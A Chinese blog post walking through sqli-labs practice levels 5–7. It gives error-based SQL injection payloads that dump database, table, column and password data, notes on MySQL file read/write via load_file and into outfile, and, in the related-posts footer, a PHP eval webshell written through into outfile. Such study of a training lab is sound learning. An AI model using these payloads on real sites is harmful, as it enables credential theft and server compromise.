sqli-libs(Less5~Less7)

最新推荐文章于 2022-12-31 20:08:48 发布
最新推荐文章于 2022-12-31 20:08:48 发布
阅读量740 收藏
点赞数
文章标签: 数据库 web安全 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/henghengzhao_/article/details/127353619
版权

去做了几道ctf题,发现自己还是太菜了,于是还是回来老老实实先把最基本的靶场打完吧

接下来就不写的那么详细了,贴图不会那么多了,只记录关键的代码,以及相关的知识点

Less5

  • 看标题有以下几个关键词:get方法,双查询,单引号,字符型

  • 接下来我们的目标就明确了

?id=1'
#单引号报错,说明是单引号或者单引号加括号
?id=1'--+
#正常,说明是单引号闭合
?id=1' order by 3 --+
#有3列
?id=-1' union select 1,2,3--+
#无回显
?id=1' and length(database())>1--+
#可以利用布尔盲注,但是我实在是不想用,那个爆破着是真的慢
#我们试试报错注入
?id=-1' or updatexml(1,concat(0x7e,database(),0x7e),1)--+ 
#爆出数据库名:security
?id=-1' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)--+ 
#表名:emails,referers,uagents,users
?id=-1' or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)--+ 
#列名:id,username,password
?id=-1' or updatexml(1,concat(0x7e,(select password from users limit 0,1),0x7e),1)--+

报错注入实在是没啥说的,连个过滤都没有

Less6

  • 关键词:get方法,双查询,双引号,字符型

  • 话不多说,直接上代码

?id=1"
#双引号报错
?id=1"--+
#正常,说明是双引号闭合
?id=1" order by 3--+
#四列
?id=1" union select 1,2,3--+
#无回显,试试报错注入
?id=-1" or updatexml(1,concat(0x7e,database(),0x7e),1)--+
#得到数据库名:security
#剩下的参考上面那一关吧,都一样,只不过是单引号变双引号

Less7

  • 关键词:get方法,转储到输出文件,字符型

  • 好家伙,终于碰见知识盲区了,我们先补充一波知识点再开始上代码(后来想起来之前学过这一块,sql注入文件读写,额,真是健忘啊我)

?id=1'))--+
#新奇操作,这个闭合方式竟然是')),第一次知道这种方式
?id=-1')) or updatexml(1,concat(0x7e,database(),0x7e),1)--+ 
#联合查询不行,报错注入不行
?id=1')) and length(database())>100--+ 
#布尔盲注貌似可以,但是我真的不想用布尔盲注,太慢了
#按照提示,文件读写吧

文件读取知识点补充:

文件读取基本条件:

  1. 当前用户权限对该文件可读。

  2. 文件在该服务器上。

  3. 路径完整。

  4. 文件大小小于max_sllowed_packet。

  5. 当前数据库用户有FILE权限,File_priv为yes

  6. secure_file_priv的值为空,如果值为某目录,那么就只能对该目录的文件进行操作

select File_priv from mysql.user where user='root' and host='localhost'
#实战中我们就可以根据这里来判断是否我们有读写权限
show variables like 'max_allowed_packet'
#查看可读写文件大小,My.ini配置文件中本没有max_allowed_packet这一项,可以通过添加来修改可读写文件大小

My.ini配置文件中也没有secure_file_priv这一项,默认为不允许读写磁盘中任何未知的文件,也就是说默认值为NULL。这里的null不是空

关于/和\,读文件时只能用/,写文件时两者都可以

  • 读文件:select load_file("D:\123.txt")

  • 写文件:select "test" into outfile "D:\234.txt"

当我们知道了如何读写,接下来难点就是如何判断文件路径了

  • 这一关实在是不会了,因为不知道网站绝对路径,即使写了木马上去,蚁剑也连接不了,因为没有url,正常思路就是写文件,写一句话木马,然后蚁剑连接

henghengzhao_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
sqli-libs------less1-less8
qq_46116117的博客
01-05 2398
sqli-libs sql注入思路 判读是否存在注入–判断注入类型–猜解字段数–查看输出字段位置–尝试爆出数据 获取数据库名–获取表名–获取列名–获取数据 less–1 页面让我们输入一个id值 我们用get的请求方式输入看看 测试这里是否有注入点 ?id=1' 出现报错情况,说明这里有注入点 判断注入类型 ?id=1' and 1=1--+ 为正常页面 ?id=1' and 1=2--+ 页面显示不正常 则为,字符型注入 猜测他的查询语句为 select *from * where ID=
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
sqli-libs
weixin_30293079的博客
12-02 128
这是抄袭你们 铃兰师姐总结的,尽管她很不情愿。 (现在只是第八关,相信她会努力的,一定会做完,我也会随时在这个上面更新的,这个是在本地搭建的,想要这个的可以找你们铃兰师姐要啊!!!) less-1: 1、获取当前数据库名 http://127.0.0.1/sqli-labs/Less-1/?id=' union select 1,2,(select database())--+ ...
【20171103中】sqli-libs Less 40-49
weixin_30872337的博客
11-03 101
Less 40:   题目:   分析:此题可以实现sql的叠加,即注入的时候可以构成sql1;sql2...执行。   payload:http://192.168.162.135/sqli-libs/Less-40/?id=1');insert into users(id,username,password) value('100','hello','world')--+...
sqli-libs(7)
weixin_30566149的博客
05-22 285
导出文件GET字符型注入 0x01介绍 导出到文件就是可以将查询结果导出到一个文件中,如常见的将一句话木马导出到一个php文件中,sqlmap中也有导出一句话和一个文件上传的页面 常用的语句是: select "<?php @eval($_POST['giantbranch']);?>" into outfile "XXX\test.php" ,当这里要获取到网站的在系统中的具...
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
phpstudy+靶场sqli-labs-master下载
最新发布
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个关于SQL注入(SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
sqli-lib64关闯关笔记学习资料.zip
08-22
总结的64关笔记,有之前师傅写的,也有我写的,可以作为参考,只要是存到这里防止丢失,有喜欢的朋友可以一起下载看看,学习一下,我常用的环境是WAMP。
sqli-libs(3)
weixin_30438813的博客
05-18 131
今天我们来讲解 sqli-libs(3) 有括号的单引号报错 首先我们来查看加入'看报错了 在加‘’ 没报错 证明 存在注入 然后我们看加入’的报错回显的是什么 和我们的sqli-libs(1)的报错对比一下 发现多了一个)证明他的语句变成了 id=那我们可以根据此特性构造闭合语句 我们查看源代码 发现确实是多了 括号的 我们此时在构造id=1')闭合前面的括号和引号 而后面的...
sqli-libs系列
qq_43511094的博客
12-31 1575
sqllibs information_schema中的表实际上是视图,而不是基本表,因此,文件系统上没有与之相关的文件 information_schema库中常用的表 schemate 这个表就很强,可以显示所有数据库的信息,注意,是数据库,不是表,show databases 就是从这个表中获取数据,schema_name就
sqli-libs 1-5
鲨鱼辣椒的博客
05-19 347
目录 sqlmap 判断是否有注入点 获取数据库名 获取数据库中的表名 获取表中的列名 获取列中的字段 sqlmap 判断是否有注入点 sqlmap.py -u http://127.0.0.1/sqli/sqli-labs-master/Less-1/?id=1 看报错可知,首先是GET请求,然后有四种注入类型依次分别是布尔型盲注、报错注入、时间型盲注、和联合注入 获取数据库sqlmap.py -u http://127.0.0.1/sqli/sqli-labs.
sqli-libs(1-10关)
weixin_44216796的博客
11-29 467
urlib库 urllib库是Python中一个最基本的网络请求库。可以模拟浏览器的行为,向指定的服务器发送一个请求 ,并可以保存服务器返回的数据。 urlopen函数 在Python3的urllib库中,所有和网络请求相关的万法,都被集到urllib.request 模块下面了,以先来看下urlopen函数基本的使用: from urllib import request resp = request.urlopen(‘http://www.baidu.com’) #ctrl+b 查看参数 print(r
SQLI-libs 1-8
qq_43871200的博客
03-20 317
前几天看到同学在群里发的sqli-libs教程,想着在家闲着也是无聊,不如搞点事情,于是按照教程下载了phpstudy和sqli-libs,学习一波 第一二三关没什么好说的,总结 查库名:select schema_name from information_schema.schemata 查表名:select table_name from information_schema.tables ...
sqli下载及安装(sqli-libs)-图文详解+phpStudy配置
wzhua的博客
09-12 3846
sqli下载及安装-图文详解 (配置phpStudy)+phpStudy下载链接 配置
sqli-libs(1-6)闯关笔记(纯手注)
qq_40671478的博客
08-12 906
SQL/Less-1 单引号字符串型回显注入 1.判断闭合字符 http://182.92.220.201/Less-1/?id=1' #报错信息use near ''1'' LIMIT 0,1' at line 1 http://182.92.220.201/Less-1/?id=1' and 1=1 -- = #正常 #注意:注释符--后面要有空格 http://182.92.220.201/Less-1/?id=1' and 1=2 -- = #异常 http://182.92.220.201/L
sqli-libs less1(union 字符注入)
weixin_42728957的博客
12-10 251
打开后,提示输入id并赋值 1、寻找注入点 输入?id=1返回数据,输入?id=1’报错,说明存在sql注入漏洞 根据报错信息,猜想输入参数的值被放到一对单引号之间。 猜测后台源码中存在类似于如下的数据库查询语句(可查看后台源码证实猜测): SELECT * FROM users WHERE id='$id' LIMIT 0,1 2、order by 查询该数据表中的字段数量 输入?id=1’ order by 3 --+ 正常; 输入?id=1’ order by 4 --+ 报错,说明该数据表中字
sqli-labs Less-7
08-28
SQLi-Labs是一个用于学习和练习SQL注入的在线平台,其中包含了多个不同的注入场景。Less-7是其中的一个场景,它主要讲解的是SQL注入的基础知识。 在Less-7中,我们需要通过注入来绕过登录认证,获取到管理员的权限。具体步骤如下: 1. 打开SQLi-Labs平台,并选择Less-7场景。 2. 在登录框中输入任意用户名和密码,然后点击登录按钮。 3. 拦截登录请求,使用Burp Suite等工具修改POST请求的参数。 4. 在密码字段中尝试注入Payload,例如:'or '1'='1。 5. 发送修改后的请求,查看服务器返回的响应。 6. 如果成功绕过认证,系统会显示管理员页面。 请注意,在实际应用中,SQL注入是一种严重的安全漏洞,攻击者可以利用它来执行恶意操作。因此,保护应用程序免受SQL注入攻击至关重要。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

henghengzhao_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值